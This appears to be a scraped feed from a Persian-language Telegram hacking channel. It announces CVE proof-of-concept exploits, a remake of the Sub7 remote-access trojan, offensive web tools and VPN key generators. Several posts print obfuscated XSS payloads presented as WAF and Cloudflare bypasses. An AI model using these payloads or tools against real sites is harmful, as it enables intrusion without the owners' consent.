CVE-2023-28229 - Windows CNG KeyIso RPC EoP/SBX
Github
#redteam #CVE
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#redteam #CVE
——————
0Day.Today
@LearnExploit
@Tech_Army
خیلیاتون مشکل VPN دارین یا دنبال VPN های پولی این اکثرا همه سرویس ها روی ipv6 ( آی پی ورژن 6 ) بالا میان مثل وارپ و ...... حتما امتحان کنین نتیجه میده اگرم دنبال Key وارپین از باتی که میزارم این زیر استفاده کنین . ( خودم رو ایرانسل جواب گرفتم اگر شما ام با همراه یا رایتل جواب گرفتین همین زیر بگین ❤️ )
Generate 12 PB Warp keys
#VPN
——————
0Day.Today
@LearnExploit
@Tech_Army
Generate 12 PB Warp keys
#VPN
——————
0Day.Today
@LearnExploit
@Tech_Army
0Day.Today | Learn Exploit | Zero World | Dark web |
خیلی هاتون با ابزار sub7 آشنایین و باهاش خاطره دارید حالا شخصی به اسم DarkCoderSc اومده و اون رو Remake کرده و سورس کد هاشو هم داخل گیت هاب براتون گذاشته که میتونین باز یه سر به این ابزار معروف بزنین :) SubSeven Legacy ( sub7 ) #Tools —————— 0Day.Today…
ابزار Sub7 رو که یادتونه ؟ حالا شخصی اومده براتون سورس کدش رو در دسترس گذاشته که میتونین یه نگاه به این ابزار نوستالژی بندازین .
Gitlab
#rat #tools
——————
0Day.Today
@LearnExploit
@Tech_Army
Gitlab
#rat #tools
——————
0Day.Today
@LearnExploit
@Tech_Army
دانلود منیجر persepolis ساخته علیرضا امیرصمیمی که تقریبا آپدیتش قدیمی شده و آپدیتی براش منتشر نشده , حالا شخصی اومده و این دانلود منیجر رو با اسم Ghermez توسعه داده و شما برای سیستم عامل هاتون ( لینوکس , مک و ویندوز ) میتونین اونو دانلود کنین و استفاده کنید .
Ghermez
#Tools #ایرانی
——————
0Day.Today
@LearnExploit
@Tech_Army
Ghermez
#Tools #ایرانی
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2023-37988 - Wordpress/Plugin - Contact Form Generator [RXSS]
Github
#CVE #Wordpress #RXSS
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#CVE #Wordpress #RXSS
——————
0Day.Today
@LearnExploit
@Tech_Army
SSRF King - SSRF plugin for burp Automates SSRF
Github
#plugin #Burpsuite
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#plugin #Burpsuite
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2023-34039-main.zip
126.9 KB
VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE (CVE-2023-34039)
#CVE #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army
#CVE #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army
bugcod3
#rat #windows #malware
0Day.Today
Please open Telegram to view this post
VIEW IN TELEGRAM
ابزار Shuck ابزاری برای کرک hash با دیتابیس HIBP
Shuck.sh
#hash
——————
0Day.Today
@LearnExploit
@Tech_Army
Shuck.sh
#hash
——————
0Day.Today
@LearnExploit
@Tech_Army
Advanced XSS Detection Suite
XSStrike is a Cross Site Scripting detection suite equipped with four hand written parsers, an intelligent payload generator, a powerful fuzzing engine and an incredibly fast crawler.
Instead of injecting payloads and checking it works like all the other tools do, XSStrike analyses the response with multiple parsers and then crafts payloads that are guaranteed to work by context analysis integrated with a fuzzing engine. Here are some examples of the payloads generated by XSStrike:
}]};(confirm)()//\Apart from that, XSStrike has crawling, fuzzing, parameter discovery, WAF detection capabilities as well. It also scans for DOM XSS vulnerabilities.
<A%0aONMouseOvER%0d=%0d[8].find(confirm)>z
</tiTlE/><a%0donpOintErentER%0d=%0d(prompt)``>z
</SCRiPT/><DETAILs/+/onpoINTERenTEr%0a=%0aa=prompt,a()//
Main Features
bugcod3#XSS #Scanner #Exploit #Python
0Day.Today
Please open Telegram to view this post
VIEW IN TELEGRAM
Xss Bypass Waf
——————
0Day.Today
@LearnExploit
@Tech_Army
<details%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc%28%60xss%60%26%2300000000000000000041//
#bypass #waf ——————
0Day.Today
@LearnExploit
@Tech_Army
HTTP Parameter Discovery Suite
Arjun can find query parameters for URL endpoints. If you don't get what that means, it's okay, read along.
Web applications use parameters (or queries) to accept user input, take the following example into consideration
http://api.example.com/v1/userinfo?id=751634589This URL seems to load user information for a specific user id, but what if there exists a parameter named
admin
which when set to True
makes the endpoint provide more information about the user?This is what Arjun does, it finds valid HTTP parameters with a huge default dictionary of 25,890 parameter names.
The best part? It takes less than 10 seconds to go through this huge list while making just 50-60 requests to the target. Here's how
GET/POST/POST-JSON/POST-XML
requestsYou can install
arjun
with pip as following:➜ ~
pip3 install arjun
or, by downloading this repository and running➜ ~
python3 setup.py install
BugCod3#Recon #Api #Testing #Fuzzer #Fuzzing
0Day.Today
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from hr
CVE-2023-36745: Microsoft Exchange Server RCE CVE-2023-36745
read
Poc
#cve #rce
——————
0Day.Today
@LearnExploit
@Tech_Army
read
Poc
#cve #rce
——————
0Day.Today
@LearnExploit
@Tech_Army
Cybersecurity News
Microsoft Exchange Server RCE (CVE-2023-36745) Flaw Gets PoC Exploit
Proof-of-concept (PoC) exploit code has been published for a Microsoft Exchange Server vulnerability tracked as CVE-2023-36745
CloudFlare WAF bypass payload
<inpuT autofocus oNFocus="setTimeout(function() { /*\*/top['al'+'\u0065'+'rt'](1)/*\*/ }, 5000);"></inpuT%3E;
#WAF #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
<inpuT autofocus oNFocus="setTimeout(function() { /*\*/top['al'+'\u0065'+'rt'](1)/*\*/ }, 5000);"></inpuT%3E;
#WAF #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army